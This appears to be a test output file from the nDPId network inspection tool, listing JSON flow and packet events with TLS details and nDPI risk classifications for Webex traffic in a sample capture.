-00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1444570624860,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570624860,"pkt":"ABoRAAACABoRAAABCABFAAAoOXRAAEAGTagKCAABQERpZ6GCAbtPGIcNsOd49FAQOQgf2QAA"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570624853,"flow_last_seen":1444570624860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1444570624860,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 
HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570624853,"flow_last_seen":1444570625424,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2720,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":516,"midstream":0,"thread_ts_msec":1444570625424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","server_names":"*.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
-00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570627404,"flow_last_seen":1444570627404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570627404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1444570627404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570627404,"pkt":"ABoRAAACABoRAAABCABFAAA8hnNAAEAGAJUKCAABQERpZ6GEAbuwMDkNAAAAAKACOQgO\/QAAAgQFtAQCCAoATL9+AAAAAAEDAwY="} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1444570627409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570627409,"pkt":"ABoRAAACABoRAAABCABFAAAoASZAABAGtfZARGlnCggAAQG7oYRPz8bysDA5DlAS\/\/9Y3gAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1444570627410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570627410,"pkt":"ABoRAAACABoRAAABCABFAAAohnRAAEAGAKgKCAABQERpZ6GEAbuwMDkOT8\/G81AQOQgf1wAA"} 
-00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570627404,"flow_last_seen":1444570627411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570627411,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":65,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570627404,"flow_last_seen":1444570627815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1444570627815,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} 
-00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570628113,"flow_last_seen":1444570628113,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570628113,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1444570628113,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570628113,"pkt":"ABoRAAACABoRAAABCABFAAA8CqVAAEAGfGMKCAABQERpZ6GGAbuTEbVkAAAAAKACOQivfwAAAgQFtAQCCAoATL\/BAAAAAAEDAwY="} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1444570628117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628117,"pkt":"ABoRAAACABoRAAABCABFAAAoATVAABAGtedARGlnCggAAQG7oYZs7kqbkxG1ZVAS\/\/9Y3AAA"} 
-00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570628117,"flow_last_seen":1444570628117,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570628117,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1444570628117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570628117,"pkt":"ABoRAAACABoRAAABCABFAAA8SvxAAEAGPAwKCAABQERpZ6GHAbtcKPU9AAAAAKACOQimjgAAAgQFtAQCCAoATL\/BAAAAAAEDAwY="} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1444570628121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628121,"pkt":"ABoRAAACABoRAAABCABFAAAoATZAABAGteZARGlnCggAAQG7oYej1wrCXCj1PlAS\/\/9Y2wAA"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1444570628121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628121,"pkt":"ABoRAAACABoRAAABCABFAAAoCqZAAEAGfHYKCAABQERpZ6GGAbuTEbVlbO5KnFAQOQgf1QAA"} 
-00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628113,"flow_last_seen":1444570628121,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570628121,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1444570628122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570628122,"pkt":"ABoRAAACABoRAAABCABFAAAoSv1AAEAGPB8KCAABQERpZ6GHAbtcKPU+o9cKw1AQOQgf1AAA"} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570628117,"flow_last_seen":1444570628122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1444570628122,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": 
{"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"webex.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628113,"flow_last_seen":1444570628514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1444570628514,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41350,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00997{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"webex.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570628117,"flow_last_seen":1444570628565,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":356,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1444570628565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41351,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) 
Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570630272,"flow_last_seen":1444570630272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570630272,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"185.63.147.10","src_port":54651,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1444570630272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1444570630272,"pkt":"ABoRAAACABoRAAABCABFAAA0ymtAAEAGS1oKhc4vuT+TCtV7Abs2TX647AAfvYARAZp5QwAAAQEICgBMwJ1XHSbf"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1444570630272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570630272,"pkt":"ABoRAAACABoRAAABCABFAAAoAWBAABAGRHK5P5MKCoXOLwG71XvsAB+9Nk1+uVAQ\/\/\/y2gAA"} 
-00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"webex.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1444570630272,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570630272,"pkt":"ABoRAAACABoRAAABCABFAAAoAWFAABAGRHG5P5MKCoXOLwG71XvsAB+9Nk1+uVAR\/\/\/y2QAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570631058,"flow_last_seen":1444570631058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1444570631058,"l3_proto":"ip4","src_ip":"10.133.206.47","dst_ip":"107.20.242.44","src_port":59447,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1444570631058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1444570631058,"pkt":"ABoRAAACABoRAAABCABFAAA0G+BAAEAG6O4Khc4vaxTyLOg3Abv3v7ExKrw8QIARAiEILgAAAQEICgBMwOxXHSRB"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1444570631058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631058,"pkt":"ABoRAAACABoRAAABCABFAAAoAWRAABAGM3drFPIsCoXOLwG76DcqvDxA97+xMlAQ\/\/9\/\/QAA"} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"webex.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1444570631059,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631059,"pkt":"ABoRAAACABoRAAABCABFAAAoAWVAABAGM3ZrFPIsCoXOLwG76DcqvDxA97+xMlAR\/\/9\/\/AAA"} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570631722,"flow_last_seen":1444570631722,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570631722,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1444570631722,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570631722,"pkt":"ABoRAAACABoRAAABCABFAAA87rhAAEAGmE8KCAABQERpZ6GKAbt6Ji+WAAAAAKACOQhMyAAAAgQFtAQCCAoATMEuAAAAAAEDAwY="} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1444570631726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631726,"pkt":"ABoRAAACABoRAAABCABFAAAoAWZAABAGtbZARGlnCggAAQG7oYqF2dBpeiYvl1AS\/\/9Y2AAA"} 
-00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1444570631726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570631726,"pkt":"ABoRAAACABoRAAABCABFAAAo7rlAAEAGmGIKCAABQERpZ6GKAbt6Ji+XhdnQalAQOQgf0QAA"} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570631722,"flow_last_seen":1444570631731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570631731,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01401{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"webex.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570631722,"flow_last_seen":1444570632251,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2579,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":500,"midstream":0,"thread_ts_msec":1444570632251,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41354,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":189,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570632436,"flow_last_seen":1444570632436,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570632436,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":189,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1444570632436,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570632436,"pkt":"ABoRAAACABoRAAABCABFAAA8E6FAAEAGB\/MKCAABFyz987+YAbs3etLXAAAAAKACOQhiaAAAAgQFtAQCCAoATMF2AAAAAAEDAwY="} 
-00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":190,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1444570632439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570632439,"pkt":"ABoRAAACABoRAAABCABFAAAoAWtAABAGSj0XLP3zCggAAQG7v5jIhS0oN3rS2FAS\/\/\/PVQAA"} -00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":191,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1444570632470,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570632470,"pkt":"ABoRAAACABoRAAABCABFAAAoE6JAAEAGCAYKCAABFyz987+YAbs3etLYyIUtKVAQOQiWTgAA"} -00925{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":192,"source":"webex.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570632436,"flow_last_seen":1444570632470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570632470,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"23.44.253.243","src_port":49048,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
